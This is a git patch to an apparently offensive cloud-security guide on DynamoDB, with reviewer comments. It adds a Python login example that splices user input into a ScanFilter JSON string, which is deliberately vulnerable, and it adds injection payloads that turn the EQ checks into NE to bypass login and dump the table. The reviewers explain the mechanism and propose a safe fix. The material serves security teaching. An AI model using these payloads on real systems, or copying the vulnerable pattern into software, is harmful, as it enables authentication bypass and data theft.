From 6b45f8d974cac524e364cb9f175be721bcf0e4c2 Mon Sep 17 00:00:00 2001 From: CPol Date: Sat, 25 May 2024 16:19:14 +0000 Subject: [PATCH] GITBOOK-612: No subject --- .../aws-services/aws-dynamodb-enum.md | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) diff --git a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index d23d448850..76577bf571 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -123,6 +123,10 @@ If you can **change the comparison** performed or add new ones, you could retrie ### Raw Json injection +{% hint style="danger" %} +**This vulnerability is based on dynamodb Scan Filter which is now deprecated!** +{% endhint %} + **DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. For example, injecting in a request like: @@ -139,6 +143,31 @@ an attacker could inject something like: fix the "EQ" condition searching for the ID 1000 and then looking for all the data with a Id string greater and 0, which is all. +Another **vulnerable example using a login** could be: + +```python +scan_filter = """{ + "username": { + "ComparisonOperator": "EQ", + "AttributeValueList": [{"S": "%s"}] + }, + "password": { + "ComparisonOperator": "EQ", + "AttributeValueList": [{"S": "%s"}] + } +} +""" % (user_data['username'], user_data['password']) + +dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter)) +``` + +This would be vulnerable to: + +``` +username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none +password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none +``` + ### :property Injection Some SDKs allows to use a string indicating the filtering to be performed like:
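Review bot: the deprecation hint in the first hunk (`**This vulnerability is based on dynamodb Scan Filter which is now deprecated!**`) should name the actual request parameter, `ScanFilter`, since that is what the code later in the section passes to `dynamodb.scan`, and it should say what "deprecated" means for the reader: code that still sends `ScanFilter` keeps working, so the injection described in this section still applies to any application that has not migrated, and the bare word "deprecated" could be read as "no longer relevant". Minor: `dynamodb` should be written `DynamoDB`, matching the bold term in the paragraph directly below the hint.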
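Review bot: the login example in the second hunk only works because `json.loads` keeps the last value of a duplicated key, and the text never says so; after the `%s` substitution the `username` block contains `"ComparisonOperator"` and `"AttributeValueList"` twice, the later `NE` / `none` pair overrides the original `EQ`, and the same happens for `password`, so the scan returns every item whose username and password are not the literal string `none`, i.e. effectively the whole table. Suggest stating that outcome after `This would be vulnerable to:` so the reader understands the mechanism rather than only the payload, and adding the fix alongside it: build the filter as a Python dict (`{"username": {"ComparisonOperator": "EQ", "AttributeValueList": [{"S": user_data["username"]}]}}`) so user input is never spliced into JSON text with string formatting. Minor: `json`, `dynamodb` and `user_data` are used without being defined; `import json` and a client line such as `dynamodb = boto3.client("dynamodb")` would make the snippet self-contained.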